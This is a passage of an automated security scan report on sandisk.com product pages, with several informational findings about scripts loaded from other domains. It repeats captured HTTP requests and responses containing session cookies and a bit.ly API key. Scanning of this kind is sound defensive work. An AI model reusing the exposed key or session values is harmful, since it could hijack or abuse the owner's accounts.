<td class="two">Perform in extreme conditions, from deserts to glaciers to beaches and back again, on standard high-capacity cards that let you take your shoots to the extreme.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-032G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Whether you...re snapping wedding shots, reunion pictures, or a fast motion sequence, you...ll capture the moment with long consecutive shooting performance.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-016G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Seize the moment, no matter how long it lasts, with long consecutive shooting performance.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-008G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Get more from your advanced camera and capture all your awesome shots with lightning-fast speed.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-004G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.159. http://www.sandisk.com/products/dslr/sandisk-ultra-compact-flash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-ultra-compact-flash

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/dslr/sandisk-ultra-compact-flash HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32730
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Ultra.. Compact Flash.. 16GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk Ultra.. Compact Flash.. 8GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk Ultra.. Compact Flash.. 4GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">SanDisk Ultra.. Compact Flash.. 2GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-002G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.160. http://www.sandisk.com/products/dslr/sandisk-ultra-ii-compactflash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-ultra-ii-compactflash

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/dslr/sandisk-ultra-ii-compactflash HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32618
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
h to capture the whole trip...even if reaching the summit or replacing your lost passport takes a few weeks longer than expected. Get the memory capacity your DSLR or advanced camera deserves.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Mountain biking anyone? Got a wedding to cover? Whatever you...re doing this weekend, get a card that can capture the views...and keep the bride happy...all day long.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Because there...s a wild kingdom in your backyard. Be ready to keep catch that turf war among the robins on a dependable 2GB card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCFH-002G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.161. http://www.sandisk.com/products/dslr/sandisk-ultra-sdhc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-ultra-sdhc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/dslr/sandisk-ultra-sdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 34197
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:35 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Step up to faster shot-to-shot performance, so the shot you want is the shot you...ll get, and capture more video clips on the cards you can count on.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-032G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
ole thing on a super high-capacity, durable SanDisk Ultra.. card. Whether the days are sweltering or frosty, these cards keep up. So you...re ready for more shots and more adventure, anywhere.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
">Are you a weekend warrior? Your next adventure deserves nothing less than a rugged card with enough room to capture the whole weekend...no matter how long it takes to catch the perfect wave.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Mountain biking anyone? Whatever your idea of the perfect Saturday, get a card that can capture the views all day long.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.162. http://www.sandisk.com/products/dslr/sandisk-ultra-sdxc-cards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/dslr/sandisk-ultra-sdxc-cards

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/dslr/sandisk-ultra-sdxc-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26557
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">SanDisk Ultra.. SDXC... Card - 64 GB
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDRH-064G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.163. http://www.sandisk.com/products/gaming-cards/sandisk-gaming-compatibility-pack  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/gaming-cards/sandisk-gaming-compatibility-pack

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/gaming-cards/sandisk-gaming-compatibility-pack HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 26146
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:04 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
td class="two">Moving files from your Memory Stick Micro... (M2...) to your Sony Memory Stick PRO Duo... devices or your personal computer is a snap with the SanDisk Gaming Compatibility pack.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDM2GCP-121-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.164. http://www.sandisk.com/products/gaming-cards/sandisk-memory-stick-micro-m2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/gaming-cards/sandisk-memory-stick-micro-m2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/gaming-cards/sandisk-memory-stick-micro-m2 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33654
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">This 16GB SanDisk.. Memory Stick Micro... (M2...) gaming card can keep up with your portable gaming system. Take your favorite movies and games with you wherever you go.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Enjoy more of your favorite games, tunes and photos on your portabe game system wherever life takes you with an 8GB SanDisk.. Memory Stick Micro... (M2...) gaming card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Keep playing on and on! Your portable game system will get the storage it needs with a 4GB SanDisk.. Memory Stick Micro... (M2...) gaming card.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Save games and play off the 2GB SanDisk.. Memory Stick Micro... (M2...) gaming card on your portable game system.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2G-002G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.165. http://www.sandisk.com/products/gaming-cards/sandisk-xbox-360-usb-flash-drive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/gaming-cards/sandisk-xbox-360-usb-flash-drive

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/gaming-cards/sandisk-xbox-360-usb-flash-drive HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 49443
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
<!-- End Product Description -->

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
</sup> 16GB USB Flash Drive

           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZGXB-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
</sup> 8GB USB Flash Drive
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDCZGXB-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.166. http://www.sandisk.com/products/imaging/sandisk-extreme-sdhc-cards-  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/imaging/sandisk-extreme-sdhc-cards-

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/imaging/sandisk-extreme-sdhc-cards- HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33371
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Perform in extreme conditions, from deserts to glaciers to beaches and back again, on standard high-capacity cards that let you take your shoots to the extreme.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-032G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Whether you...re snapping wedding shots, reunion pictures, or a fast motion sequence, you...ll capture the moment with long consecutive shooting performance.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-016G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Seize the moment, no matter how long it lasts, with long consecutive shooting performance.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-008G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Get more from your advanced camera and capture all your awesome shots with lightning-fast speed.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDSDX3-004G-A31&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.167. http://www.sandisk.com/products/imaging/sandisk-ultra-memory-stick-pro-hg-duo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/imaging/sandisk-ultra-memory-stick-pro-hg-duo

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/imaging/sandisk-ultra-memory-stick-pro-hg-duo HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; ASP.NET_SessionId=1yggxw55ltii41uf0cjplwa4; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35707
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:43:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
O-HG Duo... memory card, delivering speed and reliability for fast shot-to-shot performance and top quality video recording at our highest capacity available...made for SONY.. digital cameras.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-032G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
capacity to capture high definition photo and video clips, you can get the shot you want with the 16GB SanDisk Ultra.. Memory Stick PRO-HG Duo... memory card...made for SONY.. digital cameras.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-016G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
ot-to-shot performance and top quality video recording, the 8GB SanDisk Ultra.. Memory Stick PRO-HG Duo... memory card was co-invented with SONY for high mega-pixel and high-def SONY products.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-008G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Because the shot you want should be the shot you get, step up to the 4GB SanDisk Ultra.. Memory Stick PRO-HG Duo... memory card...made for SONY.. digital cameras.
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSPDH-004G-A11&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.168. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /products/mobile-memory-products/sandisk-memory-stick-micro-m2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/mobile-memory-products/sandisk-memory-stick-micro-m2 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33088
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<!-- Code added for Bit Ly authentication for the twitter integration -->
<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=sandiskmarcom&apiKey=R_95bf3aa2652f4b1913a4aeb0a76e82d9"></script>
...[SNIP]...
</div>

   
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>

<!-- CI JS supposed to be in head section? -->
<script language="JavaScript" src="http://content.channelintelligence.com/scripts/ykb_PopupWindow.js" type="text/javascript"> </script>
<script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService_API.asp" type="text/javascript"> </script>
...[SNIP]...
<td class="two">Get more done all day with your smartphone just by adding a SanDisk 16GB*mobile memory card ... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-016G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Turn your mobile phone into the portable entertainment center it was meant to be by adding a SanDisk 8GB* mobile memory card... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-008G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone the space it craves with a SanDisk 4GB* mobile memory card ... and shoot more video on your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-004G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...
<td class="two">Give your phone room to capture the moment with a SanDisk 2GB* mobile memory card ... made for your Sony Ericsson
           <script language="JavaScript" src="http://sandisk.links.channelintelligence.com/scripts/cii_CBL_DataService.asp?sSKU=SDMSM2-002G-A11M&nRGID=2519" type="text/javascript"></script>
...[SNIP]...

2.169. http://www.sandisk.com/products/mobile-memory-products/sandisk-memory-stick-micro-m2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
